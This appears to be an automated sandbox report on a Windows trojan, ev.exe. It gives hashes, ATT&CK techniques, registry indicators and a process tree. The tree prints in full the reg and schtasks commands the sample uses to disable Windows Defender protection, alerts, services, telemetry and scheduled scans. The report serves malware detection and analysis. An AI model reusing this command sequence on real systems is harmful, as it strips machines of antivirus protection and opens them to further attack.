622bda80fb2ea6f132ff3efe37bae181b4acd0f182ae116682dcb9e6348cc26a

Analysis

max time kernel
120s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30/11/2024, 00:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ev.exe
Size

16KB
MD5

56c16aff11b467b005d11b493defbe4c
SHA1

ab7b8c80eeee91de84c1c3c3886fb18a826f1bad
SHA256

622bda80fb2ea6f132ff3efe37bae181b4acd0f182ae116682dcb9e6348cc26a
SHA512

5075f7e197b7726514e85124644442a2010d2566338fdc4b787ed74f933b83490cadcc42776282b19808f14c402ca0bdc4c3d172385b4abf418bb38dda9b3ec9
SSDEEP

192:FlSkyHv47AylNTkBr8NeFBzTvtm2F/SzbFJxTjmFpBnE:b/6vVylNXMjtm2FWF3u

Score

10^/10

defense_evasion discovery evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 13 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2028	3068	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ev.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3068 wrote to memory of 2800	3068	ev.exe	30
PID 3068 wrote to memory of 2800	3068	ev.exe	30
PID 3068 wrote to memory of 2800	3068	ev.exe	30
PID 3068 wrote to memory of 2800	3068	ev.exe	30
PID 3068 wrote to memory of 2744	3068	ev.exe	31
PID 3068 wrote to memory of 2744	3068	ev.exe	31
PID 3068 wrote to memory of 2744	3068	ev.exe	31
PID 3068 wrote to memory of 2744	3068	ev.exe	31
PID 3068 wrote to memory of 2688	3068	ev.exe	32
PID 3068 wrote to memory of 2688	3068	ev.exe	32
PID 3068 wrote to memory of 2688	3068	ev.exe	32
PID 3068 wrote to memory of 2688	3068	ev.exe	32
PID 3068 wrote to memory of 2880	3068	ev.exe	33
PID 3068 wrote to memory of 2880	3068	ev.exe	33
PID 3068 wrote to memory of 2880	3068	ev.exe	33
PID 3068 wrote to memory of 2880	3068	ev.exe	33
PID 3068 wrote to memory of 2176	3068	ev.exe	35
PID 3068 wrote to memory of 2176	3068	ev.exe	35
PID 3068 wrote to memory of 2176	3068	ev.exe	35
PID 3068 wrote to memory of 2176	3068	ev.exe	35
PID 3068 wrote to memory of 3040	3068	ev.exe	36
PID 3068 wrote to memory of 3040	3068	ev.exe	36
PID 3068 wrote to memory of 3040	3068	ev.exe	36
PID 3068 wrote to memory of 3040	3068	ev.exe	36
PID 3068 wrote to memory of 2784	3068	ev.exe	37
PID 3068 wrote to memory of 2784	3068	ev.exe	37
PID 3068 wrote to memory of 2784	3068	ev.exe	37
PID 3068 wrote to memory of 2784	3068	ev.exe	37
PID 3068 wrote to memory of 2656	3068	ev.exe	38
PID 3068 wrote to memory of 2656	3068	ev.exe	38
PID 3068 wrote to memory of 2656	3068	ev.exe	38
PID 3068 wrote to memory of 2656	3068	ev.exe	38
PID 3068 wrote to memory of 2700	3068	ev.exe	39
PID 3068 wrote to memory of 2700	3068	ev.exe	39
PID 3068 wrote to memory of 2700	3068	ev.exe	39
PID 3068 wrote to memory of 2700	3068	ev.exe	39
PID 3068 wrote to memory of 2572	3068	ev.exe	40
PID 3068 wrote to memory of 2572	3068	ev.exe	40
PID 3068 wrote to memory of 2572	3068	ev.exe	40
PID 3068 wrote to memory of 2572	3068	ev.exe	40
PID 3068 wrote to memory of 2144	3068	ev.exe	41
PID 3068 wrote to memory of 2144	3068	ev.exe	41
PID 3068 wrote to memory of 2144	3068	ev.exe	41
PID 3068 wrote to memory of 2144	3068	ev.exe	41
PID 3068 wrote to memory of 2564	3068	ev.exe	42
PID 3068 wrote to memory of 2564	3068	ev.exe	42
PID 3068 wrote to memory of 2564	3068	ev.exe	42
PID 3068 wrote to memory of 2564	3068	ev.exe	42
PID 3068 wrote to memory of 2856	3068	ev.exe	43
PID 3068 wrote to memory of 2856	3068	ev.exe	43
PID 3068 wrote to memory of 2856	3068	ev.exe	43
PID 3068 wrote to memory of 2856	3068	ev.exe	43
PID 3068 wrote to memory of 2984	3068	ev.exe	44
PID 3068 wrote to memory of 2984	3068	ev.exe	44
PID 3068 wrote to memory of 2984	3068	ev.exe	44
PID 3068 wrote to memory of 2984	3068	ev.exe	44
PID 3068 wrote to memory of 2704	3068	ev.exe	45
PID 3068 wrote to memory of 2704	3068	ev.exe	45
PID 3068 wrote to memory of 2704	3068	ev.exe	45
PID 3068 wrote to memory of 2704	3068	ev.exe	45
PID 3068 wrote to memory of 2712	3068	ev.exe	46
PID 3068 wrote to memory of 2712	3068	ev.exe	46
PID 3068 wrote to memory of 2712	3068	ev.exe	46
PID 3068 wrote to memory of 2712	3068	ev.exe	46

C:\Users\Admin\AppData\Local\Temp\ev.exe
"C:\Users\Admin\AppData\Local\Temp\ev.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2800
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender notification settings
    - System Location Discovery: System Language Discovery
    PID:2348
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2744
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2688
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1460
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:2880
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2176
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:616
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3040
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2784
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:2600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
  2⤵
  PID:2656
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3060
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2572
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1416
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2144
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:2220
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2856
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:2608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2984
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2288
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:2512
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2712
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:2124
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2584
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2912
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2540
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2548
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1336
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2556
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2580
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:2504
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2968
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2896
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:2388
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    - System Location Discovery: System Language Discovery
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:2104
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2188
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2236
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2292
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1212
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - System Location Discovery: System Language Discovery
